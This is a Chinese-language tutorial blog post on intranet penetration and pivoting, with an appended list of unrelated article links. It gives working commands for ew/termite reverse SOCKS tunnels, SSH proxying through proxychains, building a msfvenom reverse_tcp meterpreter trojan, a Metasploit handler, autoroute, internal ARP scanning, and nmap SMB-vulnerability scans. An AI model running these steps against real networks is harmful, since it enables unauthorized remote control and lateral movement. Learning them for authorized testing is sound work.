当前位置: 首页 > news >正文

内网安全-内网穿透

目录

内网渗透

Nc使用详解

Nc监听和探测

Nc传文件

termite内网穿透工具

ssh代理内网穿透

ssh配置socket代理

MSF多级网络穿透


内网渗透

Nc使用详解
Nc监听和探测


Nc传文件


termite内网穿透工具


1、termite 之前叫ew    (可以进行正向连接,可以进行反向连接)
​
2、
靶机监听流量转发:./ew_for_linux64 -s rcsocks -l 1111 -e 2222#将1111端口监听到的本地数据转发到 web服务器的2222端口# 通过1111端口,将本地流量转发出去#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 1000root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d lhost -e 2222
rssocks 192.168.12.128:2222 <--[10000 usec]--> socks server
​
监听机的流量转发:
#将流量通过2222端口传到192.168.16.128主机上
#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 10003、windows和linux差不多!

ssh代理内网穿透




正向代理就是利用已经控制的主机来控制更多的主机,主机可能存在内网网卡,可以通过内网穿透工具来控制内网主机! ​ 反向代理就是在本地开启一个端口,通过ssh服务把端口映射到跳板机的ssh服务器的内网ip端口上,这样内网主机就可以直接访问我们本地主机服务!

ssh配置socket代理


1、当然我们需要在 /etc/proxychains4.conf 文件里面修改代理端口
我们就可以直接使用本地流量进行攻击!┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks" | tail -1
socks5  127.0.0.1 8081代理完成之后就可以使用本地流量进行内网信息收集了

MSF多级网络穿透


1、可以先控制web主机。直接生成监听木马,然后利用web主机的漏洞从而获取到meterpreter!
msfvenom -p windwos/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f exe > shell.exe
-p:指定payload
-f:指定生成木马类型2、msfconsole 监听模块
use exploit/multi/handler
set payload windwos/meterpreter/reverse_tcp
set lhost 本地监听IP
set lport 本地监听端口  (这几个参数要和生成的木马一样!!)
在web主机上运行shell.exe即可!3、添加内网静态路由
run autoroute -s 内网IP网段
然后就可以扫描该网段了
run post/windwos/gather/arp_scanner RHOSTS=内网IP网段
当然我们也可以使用msf自带的端口扫描模块(auxiliary/scanner/portscan/tcp)4、socks5代理
如果我们想在本地使用扫描器来进行内网信息收集,我们就可以利用msf的socks5代理设置,前提是我们已经拿到了web主机的meterpreter了!
use auxiliary/server/socks_unc
set srvhost 127.0.0.1
set srvport 1234
run┌──(root㉿ru)-[~/kali]
└─# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:45163         0.0.0.0:*               LISTEN      1150/containerd
tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      19399/ruby
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1174/sshd: /usr/sbi
tcp6       0      0 :::22┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks5" | tail -1
socks5  127.0.0.1 1234这样我们就搞定了
nmap:
proxychains4 nmap -sT -sV -Pn -n -p 22,80,135,139,3389,445  --script=smb-vuln-ms* 内网IP  (正向扫描)在此之后,我们再次进行msf漏洞攻击的时候就必须使用正向的payload了!

相关文章:

  • Stable Diffusion 模型下载:Disney Pixar Cartoon Type B(迪士尼皮克斯动画片B类)
  • vue+springboot前后端视频文件等的上传与展示(基于七牛云)
  • Elasticsearch:混合搜索是 GenAI 应用的未来
  • Leetcode 300 最长递增子序列
  • 【Java万花筒】加速Java应用程序:探索性能优化的利器
  • 基于华为云欧拉操作系统(HCE OS)构建HCE OS基础镜像
  • 【Redis笔记】分布式锁及4种常见实现方法
  • vue-生命周期+工程化开发(三)
  • C++ //练习 6.4 编写一个与用户交互的函数,要求用户输入一个数字,计算生成该数字的阶乘。在main函数中调用该函数。
  • UDP端口探活的那些细节
  • 第69讲后端登录逻辑实现
  • 力扣hot100 -- 双指针
  • 【设计模式】23中设计模式笔记
  • 1.2 Verilog 简介及发展历史
  • Seurat - 聚类教程 (1)
  • php的引用
  • 【附node操作实例】redis简明入门系列—字符串类型
  • angular2 简述
  • ES6系列(二)变量的解构赋值
  • javascript 总结(常用工具类的封装)
  • Java到底能干嘛?
  • Java精华积累:初学者都应该搞懂的问题
  • jdbc就是这么简单
  • Laravel Mix运行时关于es2015报错解决方案
  • Linux学习笔记6-使用fdisk进行磁盘管理
  • Python十分钟制作属于你自己的个性logo
  • SQLServer之索引简介
  • Vue 重置组件到初始状态
  • vue.js框架原理浅析
  • Vue官网教程学习过程中值得记录的一些事情
  • 读懂package.json -- 依赖管理
  • 记录:CentOS7.2配置LNMP环境记录
  • 解决iview多表头动态更改列元素发生的错误
  • 前端攻城师
  • 悄悄地说一个bug
  • 提升用户体验的利器——使用Vue-Occupy实现占位效果
  • 小程序开发之路(一)
  • 学习笔记DL002:AI、机器学习、表示学习、深度学习,第一次大衰退
  • 1.Ext JS 建立web开发工程
  • Semaphore
  • 函数计算新功能-----支持C#函数
  • ​水经微图Web1.5.0版即将上线
  • # C++之functional库用法整理
  • #if和#ifdef区别
  • #周末课堂# 【Linux + JVM + Mysql高级性能优化班】(火热报名中~~~)
  • (04)odoo视图操作
  • (12)Linux 常见的三种进程状态
  • (2)(2.4) TerraRanger Tower/Tower EVO(360度)
  • (html5)在移动端input输入搜索项后 输入法下面为什么不想百度那样出现前往? 而我的出现的是换行...
  • (pojstep1.1.2)2654(直叙式模拟)
  • (TipsTricks)用客户端模板精简JavaScript代码
  • (TOJ2804)Even? Odd?
  • (九十四)函数和二维数组
  • (南京观海微电子)——I3C协议介绍
  • (十)DDRC架构组成、效率Efficiency及功能实现